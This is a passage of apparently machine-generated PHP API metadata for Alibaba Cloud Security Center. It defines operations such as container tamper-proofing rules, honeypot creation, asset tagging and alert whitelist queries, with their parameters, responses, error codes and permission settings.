'example' => '60', 'format' => 'int32', 'required' => true, 'type' => 'integer', 'title' => ''], ], [ 'name' => 'OperationBase', 'in' => 'query', 'schema' => ['description' => 'The dimension based on which the asset is selected. Valid values:'."\n" ."\n" .'* **0**: selects the asset by instance.'."\n" .'* **1**: selects the asset by machine group.'."\n" .'* **2**: selects the asset by the ID of the instance that is deployed in the virtual private cloud (VPC).'."\n", 'example' => '0', 'format' => 'int32', 'required' => false, 'type' => 'integer', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'example' => '7BC55C8F-226E-5AF5-9A2C-2EC43864****', 'type' => 'string', 'title' => ''], 'BatchId' => ['description' => 'The ID of the release batch.'."\n", 'example' => '1', 'format' => 'int64', 'type' => 'integer', 'title' => ''], ], 'type' => 'object', 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7BC55C8F-226E-5AF5-9A2C-2EC43864****\\",\\n \\"BatchId\\": 1\\n}","type":"json"}]', 'title' => 'AddPublishBatch', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddPublishBatch'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:AddPublishBatch', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'AddSasContainerWebDefenseRule' => [ 'summary' => 'Creates a rule for container tamper-proofing.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => ['operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free'], 'parameters' => [ [ 'name' => 'RuleName', 'in' => 'query', 'schema' => ['description' => 'The name of the rule.'."\n", 'type' => 'string', 'required' => false, 'example' => 'test-2020', 'maxLength' => 50, 'minLength' => 3, 'title' => ''], ], [ 'name' => 'PathConfDTOList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The paths that you want to protect.'."\n", 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'DefensePath' => ['description' => 'The path that you want to protect.'."\n", 'type' => 'string', 'required' => true, 'example' => '/usr/test/', 'maxLength' => 500, 'title' => ''], 'BackupPath' => ['description' => 'The backup path.'."\n", 'type' => 'string', 'required' => false, 'example' => '/tmp/test', 'title' => ''], 'ExcludeFilePath' => ['description' => 'The path to the file that you want to exclude.'."\n", 'type' => 'string', 'required' => false, 'example' => '/usr/test/tt', 'title' => ''], 'ExcludeFileType' => ['description' => 'The type of the file that you want to exclude.'."\n", 'type' => 'string', 'required' => false, 'example' => 'jsp', 'title' => ''], 'ExcludeFile' => ['description' => 'The file that you want to exclude.'."\n", 'type' => 'string', 'required' => false, 'example' => '/usr/test/aa', 'title' => ''], 'GuardType' => ['description' => 'The protecion mode. Valid values:'."\n" ."\n" .'* **0**: basic mode (whitelist)'."\n" .'* **1**: complex mode (blacklist)'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '0', 'title' => ''], 'IncludeFileType' => ['description' => 'The type of the file that you want to include.'."\n", 'type' => 'string', 'required' => false, 'example' => '*.jsp', 'title' => ''], 'IncludeFile' => ['description' => 'The file that you want to include.'."\n", 'type' => 'string', 'required' => false, 'example' => '/usr/test/t1', 'title' => ''], 'DefenseMode' => ['description' => 'The prevention mode. Valid values:'."\n" ."\n" .'* **block**'."\n" .'* **audit**'."\n", 'type' => 'string', 'required' => false, 'example' => 'audit', 'title' => ''], 'ProcessPathList' => [ 'description' => 'The processes that you want to add to the whitelist.'."\n", 'type' => 'array', 'items' => ['description' => 'The process that you want to add to the whitelist.'."\n", 'type' => 'string', 'required' => false, 'example' => '/bin/cp', 'maxLength' => 50, 'minLength' => 0, 'title' => ''], 'required' => true, 'maxItems' => 10, 'minItems' => 0, 'title' => '', 'example' => '', ], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 10, 'minItems' => 1, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '8B4B6E6D-B0B0-5F05-A14E-82917D9648EE', 'title' => ''], 'Data' => ['description' => 'The unique value of the created rule.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '200634', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"8B4B6E6D-B0B0-5F05-A14E-82917D9648EE\\",\\n \\"Data\\": 200634\\n}","type":"json"}]', 'title' => 'AddSasContainerWebDefenseRule', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddSasContainerWebDefenseRule'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:AddSasContainerWebDefenseRule', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'AddSasModuleTrial' => [ 'summary' => 'Enables the trial use of Security Center value-added features, including vulnerability fixing and threat analysis and response.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '196548', 'abilityTreeNodes' => ['FEATUREsas8YMQ5V'], ], 'parameters' => [ [ 'name' => 'ModuleCode', 'in' => 'query', 'schema' => ['description' => 'The code of the feature. Valid values:'."\n" ."\n" .'* **vulFix**: vulnerability fixing.'."\n" .'* **cloudSiem**: threat analysis and response.'."\n", 'type' => 'string', 'required' => false, 'example' => 'vulFix', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'PlainResult', 'description' => 'PlainResult'."\n", 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'TrialRecordList' => [ 'description' => 'The information about the trial use.'."\n", 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'ModuleCode' => ['description' => 'The code of the feature. Valid values:'."\n" ."\n" .'* **vulFix**: vulnerability fixing.'."\n" .'* **cloudSiem**: threat analysis and response.'."\n", 'type' => 'string', 'example' => 'vulFix', 'title' => ''], 'AuthLimit' => ['description' => 'The quota.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '100', 'title' => ''], 'GmtStart' => ['description' => 'The start time of the trial use.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1667232000000', 'title' => ''], 'GmtEnd' => ['description' => 'The end time of the trial use.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1638201599999', 'title' => ''], 'Status' => ['description' => 'The status of the trial use. Valid values:'."\n" ."\n" .'* **1**: The feature is in trial use.'."\n" .'* **0**: The trial use ends.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'AuthLimitList' => ['description' => 'The list of quotas. This parameter is available if the value of the ModuleCode parameter is cloudSiem. The value of this parameter consists of the log storage capacity for the threat analysis and response feature and the log data to add. Units: GB and GB-day.'."\n", 'type' => 'string', 'example' => '[100,1]', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '09969D2C-4FAD-429E-BFBF-9A60DEF8****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'WithoutTrialQualification', 'errorMessage' => 'Has no trial qualification.', 'description' => 'No probationary eligibility.'], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"TrialRecordList\\": [\\n {\\n \\"ModuleCode\\": \\"vulFix\\",\\n \\"AuthLimit\\": 100,\\n \\"GmtStart\\": 1667232000000,\\n \\"GmtEnd\\": 1638201599999,\\n \\"Status\\": 1,\\n \\"AuthLimitList\\": \\"[100,1]\\"\\n }\\n ]\\n },\\n \\"RequestId\\": \\"09969D2C-4FAD-429E-BFBF-9A60DEF8****\\"\\n}","type":"json"}]', 'title' => 'AddSasModuleTrial', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddSasModuleTrial'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:AddSasModuleTrial', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'AddTagWithUuid' => [ 'summary' => 'Adds a tag to assets.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '91904', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'TagName', 'in' => 'query', 'schema' => ['description' => 'The name of the tag.'."\n", 'type' => 'string', 'required' => true, 'example' => 'InternetIp', 'title' => ''], ], [ 'name' => 'UuidList', 'in' => 'query', 'schema' => ['description' => 'The UUIDs of the servers. Separate multiple UUIDs with commas (,).'."\n" ."\n" .'> You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to query the UUIDs of servers.'."\n", 'type' => 'string', 'required' => false, 'example' => '71f5313e-4355-4c59-86d1-557dda7b****,71f5313e-4355-4c59-86d1-557dda7b****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The object returned.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '7532B7EE-7CE7-5F4D-BF04-B12447DDCAE1', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7532B7EE-7CE7-5F4D-BF04-B12447DDCAE1\\"\\n}","type":"json"}]', 'title' => 'AddTagWithUuid', 'description' => 'Security Center provides asset importance tags and custom tags. You can call the AddTagWithUuid operation to add only a custom tag to assets.'."\n", 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddTagWithUuid'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:AddTagWithUuid', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'AddUninstallClientsByUuids' => [ 'summary' => 'Adds servers from which you want to uninstall the Security Center agent.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '91905', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request. You do not need to specify this parameter. It is automatically obtained by the system.'."\n", 'type' => 'string', 'required' => false, 'example' => '1.2.XXX.XXX', 'title' => ''], ], [ 'name' => 'Uuids', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server that you want to unbind. Separate multiple UUIDs with commas (,).'."\n" ."\n" .'> You can call the [DescribeCloudCenterInstances](~~141932~~) operation to query the UUIDs of servers.'."\n", 'type' => 'string', 'required' => true, 'example' => 'inet-183707ae-3bdf-4db0-b771-3e9962bf****,inet-49dceccc-4f01-469b-8411-2416ea12****', 'title' => ''], ], [ 'name' => 'Region', 'in' => 'query', 'schema' => ['description' => 'The region in which the server resides.'."\n", 'type' => 'string', 'required' => false, 'example' => 'cn-hangzhou', 'title' => ''], ], [ 'name' => 'CallMethod', 'in' => 'query', 'schema' => ['description' => 'The method name. Default value: init.'."\n", 'type' => 'string', 'required' => false, 'example' => 'init', 'title' => ''], ], [ 'name' => 'Feedback', 'in' => 'query', 'schema' => ['description' => 'The feedback.'."\n", 'type' => 'string', 'required' => false, 'example' => 'reinstall', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '3956048F-9D73-5EDB-834B-4827BB483977', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"3956048F-9D73-5EDB-834B-4827BB483977\\"\\n}","type":"json"}]', 'title' => 'AddUninstallClientsByUuids', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddUninstallClientsByUuids'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:AddUninstallClientsByUuids', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'AddUnknownThreatDetectProcess' => [ 'summary' => 'Adds one or more processes for intelligent behavior analysis.', 'path' => '', 'methods' => ['post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasXNUPZF'], 'autoTest' => true, 'tenantRelevance' => 'tenant', ], 'parameters' => [ [ 'name' => 'ProcessList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Sha256' => ['description' => 'The SHA-256 hash of the process file.', 'type' => 'string', 'required' => false, 'example' => 'f204693a7d2ce99d6c4434e550d985ee1c7be7cb5dd9a76094369af0d2******', 'title' => ''], 'Md5' => ['description' => 'The MD5 hash of the process file.', 'type' => 'string', 'required' => false, 'example' => 'e59b63ae983377f131ab20ec0d******', 'title' => ''], 'Remark' => ['description' => 'A remark for the process.', 'type' => 'string', 'required' => false, 'example' => '1330', 'title' => ''], 'ProcessPath' => ['description' => 'The path to the process executable.', 'type' => 'string', 'required' => false, 'example' => '/bin/rm', 'title' => ''], ], 'description' => 'Details of a single process.', 'required' => false, 'title' => '', 'example' => '', ], 'maxItems' => 100, 'description' => 'The list of processes to add.', 'required' => false, 'title' => '', 'example' => '', ], ], [ 'name' => 'UuidList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'type' => 'array', 'items' => ['description' => 'The UUID of an asset.', 'type' => 'string', 'required' => false, 'example' => '55bf7984-9b3b-4e8d-be8e-f3e5b0b4****', 'title' => ''], 'maxItems' => 100, 'description' => 'The UUIDs of assets on which the processes are located.', 'required' => false, 'title' => '', 'example' => '', ], ], [ 'name' => 'EventIdList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'type' => 'array', 'items' => ['description' => 'An associated event ID.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1', 'title' => ''], 'maxItems' => 100, 'description' => 'A list of associated event IDs.', 'required' => false, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request.', 'type' => 'string', 'title' => '', 'example' => 'ADE57832-9666-511C-9A80-B87DE2E8****'], 'IdList' => [ 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The ID generated for the added process.', 'type' => 'string', 'example' => '92666883', 'title' => ''], ], 'description' => 'The result for a single process.', 'title' => '', 'example' => '', ], 'description' => 'A list of results for the added processes.', 'title' => '', 'example' => '', ], ], 'title' => '', 'description' => 'The returned data.', 'example' => '', ], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'AddUnknownThreatDetectProcess', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:AddUnknownThreatDetectProcess', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"ADE57832-9666-511C-9A80-B87DE2E8****\\",\\n \\"IdList\\": [\\n {\\n \\"Id\\": \\"92666883\\"\\n }\\n ]\\n}","type":"json"}]', ], 'AddVpcHoneyPot' => [ 'summary' => 'Creates a honeypot.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => ['operationType' => 'create'], 'parameters' => [ [ 'name' => 'VpcId', 'in' => 'query', 'schema' => ['description' => 'The ID of the virtual private cloud (VPC) in which you want to create a honeypot.'."\n" ."\n" .'> You can call the [DescribeVpcList](~~DescribeVpcList~~) operation to obtain the VPC ID. The VPC ID is the value of the InstanceId parameter.'."\n", 'type' => 'string', 'required' => true, 'example' => 'vpc-p0w5fgkfsl5a6791q****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'CE500770-42D3-442E-9DDD-156E0F9F3B45', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'HoneyPotAuthIsNotEnough', 'errorMessage' => 'Honey pot auth is not enough.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"CE500770-42D3-442E-9DDD-156E0F9F3B45\\"\\n}","type":"json"}]', 'title' => 'AddVpcHoneyPot', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddVpcHoneyPot'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:AddVpcHoneyPot', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'AdvanceSecurityEventOperations' => [ 'summary' => 'Queries the configurations of an advanced whitelist rule.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'none', 'abilityTreeCode' => '91907', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'RuleId', 'in' => 'query', 'schema' => ['description' => 'The rule ID.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '123', 'title' => ''], ], [ 'name' => 'EventName', 'in' => 'query', 'schema' => ['description' => 'The alert name.'."\n", 'type' => 'string', 'required' => false, 'example' => '恶意脚本代码执行', 'title' => ''], ], [ 'name' => 'EventType', 'in' => 'query', 'schema' => ['description' => 'The alert event type. Valid values:'."\n" ."\n" .'* Suspicious process'."\n" .'* Webshell'."\n" .'* Unusual logon'."\n" .'* Exception'."\n" .'* Sensitive file tampering'."\n" .'* Malicious process (cloud threat detection)'."\n" .'* Unusual network connection'."\n" .'* Abnormal account'."\n" .'* Application intrusion event'."\n" .'* Cloud threat detection'."\n" .'* Precision defense'."\n" .'* Application whitelist'."\n" .'* Persistent webshell'."\n" .'* Web application threat detection'."\n" .'* Malicious script'."\n" .'* Threat intelligence'."\n" .'* Malicious network activity'."\n" .'* Cluster exception'."\n" .'* Webshell (on-premises threat detection)'."\n" .'* Vulnerability exploitation'."\n" .'* Malicious process (on-premises threat detection)'."\n" .'* Trusted exception'."\n" .'* Others'."\n" ."\n" .'For more information about alert types, see [Alerts](~~68388~~).'."\n", 'type' => 'string', 'required' => false, 'example' => '恶意脚本', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'A4EB8B1C-1DEC-5E18-BCD0-XXXXXXXXX', 'title' => ''], 'SecurityEventOperationsResponse' => [ 'description' => 'The operation performed on the alert event.'."\n", 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'OperationParams' => ['description' => 'The configuration of the operation performed to handle the alert event.'."\n", 'type' => 'string', 'example' => '{\\"subOperation\\":\\"killByMd5andPath\\"}', 'title' => ''], 'OperationCode' => ['description' => 'The operation performed to handle the alert. Valid values:'."\n" ."\n" .'* **block_ip**: blocks the alert.'."\n" .'* **advance_mark_mis_info**: adds the alert to the whitelist.'."\n" .'* **ignore**: ignores the alert.'."\n" .'* **manual_handled**: marks the alert as manually handled.'."\n" .'* **kill_process**: terminates the malicious process.'."\n" .'* **cleanup**: performs in-depth virus detection and removal.'."\n" .'* **kill_and_quara**: performs virus detection and removal.'."\n" .'* **disable_malicious_defense**: turns off malicious defense behavior.'."\n" .'* **client_problem_check**: performs troubleshooting.'."\n" .'* **quara**: performs quarantine operations.'."\n", 'type' => 'string', 'example' => 'advance_mark_mis_info', 'title' => ''], 'UserCanOperate' => ['description' => 'Indicates whether the operation can be performed.'."\n" ."\n" .'* **true**: The operation can be performed.'."\n" .'* **false**: The operation cannot be performed.'."\n", 'type' => 'boolean', 'example' => 'false', 'title' => ''], 'MarkField' => [ 'description' => 'The object on which the operation is performed. This parameter is required when you set the OperationCode parameter to **advance_mark_mis_info**.'."\n", 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'MarkMisType' => ['description' => 'The operation that is used in the whitelist rule. Valid values:'."\n" ."\n" .'* **contains**: contains'."\n" .'* **notContains**: does not contain'."\n" .'* **regex**: regular expression'."\n" .'* **strEqual**: equals'."\n" .'* **strNotEqual**: does not equal'."\n", 'type' => 'string', 'example' => 'contains', 'title' => ''], 'FiledName' => ['description' => 'The field that is used in the whitelist rule.'."\n", 'type' => 'string', 'example' => 'filePath', 'title' => ''], 'FiledAliasName' => ['description' => 'The alias of the field that is used in the whitelist rule.'."\n", 'type' => 'string', 'example' => 'file path', 'title' => ''], 'MarkMisValue' => ['description' => 'The value of the field that is used in the whitelist rule.'."\n", 'type' => 'string', 'example' => '2022-04-25 10:11:04', 'title' => ''], 'SupportedMisType' => [ 'description' => 'The operation that is used and can be modified in the whitelist rule. Valid values:'."\n" ."\n" .'* **contains**: contains'."\n" .'* **notContains**: does not contain'."\n" .'* **regex**: regular expression'."\n" .'* **strEqual**: equals'."\n" .'* **strNotEqual**: does not equal'."\n", 'type' => 'array', 'items' => ['description' => 'The operation that is used and can be modified in the whitelist rule. Valid values:'."\n" ."\n" .'* **contains**: contains'."\n" .'* **notContains**: does not contain'."\n" .'* **regex**: regular expression'."\n" .'* **strEqual**: equals'."\n" .'* **strNotEqual**: does not equal'."\n", 'type' => 'string', 'example' => 'contains', 'title' => ''], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'MarkFieldsSource' => [ 'description' => 'The metadata configuration returned by the advanced whitelist rule.'."\n", 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'FiledName' => ['description' => 'The field that can be used in the whitelist rule.'."\n", 'type' => 'string', 'example' => 'filePath', 'title' => ''], 'FiledAliasName' => ['description' => 'The alias of the field that can be used in the whitelist rule.'."\n", 'type' => 'string', 'example' => 'file path', 'title' => ''], 'MarkMisValue' => ['description' => 'The value of the field that can be used in the whitelist rule.'."\n", 'type' => 'string', 'example' => 'contains', 'title' => ''], 'SupportedMisType' => [ 'description' => 'The operation that is supported in the whitelist rule. Valid values:'."\n" ."\n" .'* **contains**: contains'."\n" .'* **notContains**: does not contain'."\n" .'* **regex**: regular expression'."\n" .'* **strEqual**: equals'."\n" .'* **strNotEqual**: does not equal'."\n", 'type' => 'array', 'items' => ['description' => 'The operation that is supported in the whitelist rule. Valid values:'."\n" ."\n" .'* **contains**: contains'."\n" .'* **notContains**: does not contain'."\n" .'* **regex**: regular expression'."\n" .'* **strEqual**: equals'."\n" .'* **strNotEqual**: does not equal'."\n", 'type' => 'string', 'example' => 'contains', 'title' => ''], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"A4EB8B1C-1DEC-5E18-BCD0-XXXXXXXXX\\",\\n \\"SecurityEventOperationsResponse\\": [\\n {\\n \\"OperationParams\\": \\"{\\\\\\\\\\\\\\"subOperation\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"killByMd5andPath\\\\\\\\\\\\\\"}\\",\\n \\"OperationCode\\": \\"advance_mark_mis_info\\",\\n \\"UserCanOperate\\": false,\\n \\"MarkField\\": [\\n {\\n \\"MarkMisType\\": \\"contains\\",\\n \\"FiledName\\": \\"filePath\\",\\n \\"FiledAliasName\\": \\"file path\\",\\n \\"MarkMisValue\\": \\"2022-04-25 10:11:04\\",\\n \\"SupportedMisType\\": [\\n \\"contains\\"\\n ]\\n }\\n ],\\n \\"MarkFieldsSource\\": [\\n {\\n \\"FiledName\\": \\"filePath\\",\\n \\"FiledAliasName\\": \\"file path\\",\\n \\"MarkMisValue\\": \\"contains\\",\\n \\"SupportedMisType\\": [\\n \\"contains\\"\\n ]\\n }\\n ]\\n }\\n ]\\n}","type":"json"}]', 'title' => 'AdvanceSecurityEventOperations', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AdvanceSecurityEventOperations'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:AdvanceSecurityEventOperations', 'authLevel' => 